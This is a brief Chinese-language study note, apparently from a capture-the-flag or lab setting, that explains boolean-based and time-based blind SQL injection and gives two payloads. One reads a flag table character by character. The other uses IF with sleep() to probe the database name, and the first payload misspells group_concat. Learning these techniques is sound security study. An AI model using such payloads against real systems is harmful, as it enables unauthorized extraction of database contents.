布尔盲注
注入语句
id=-1 or ascii( (select substr( group_cancat(flag),1,1 ) from sqli.flag )) = 99 %23
原理
利用or构成一个判断语句。成立则说明查询内容为真。
时间盲注
原理
与布尔盲注相同,利用or条件判断。但是会利用sleep来延时
报错函数
if()函数:
IF(expr1, expr2, expr3 )
如果expr1是TRUE,则返回expr2,否则返回expr3
payload
id=-1 or if( (select substr(group_concat(database()),1,1)) = 's', sleep(3),0 ) %23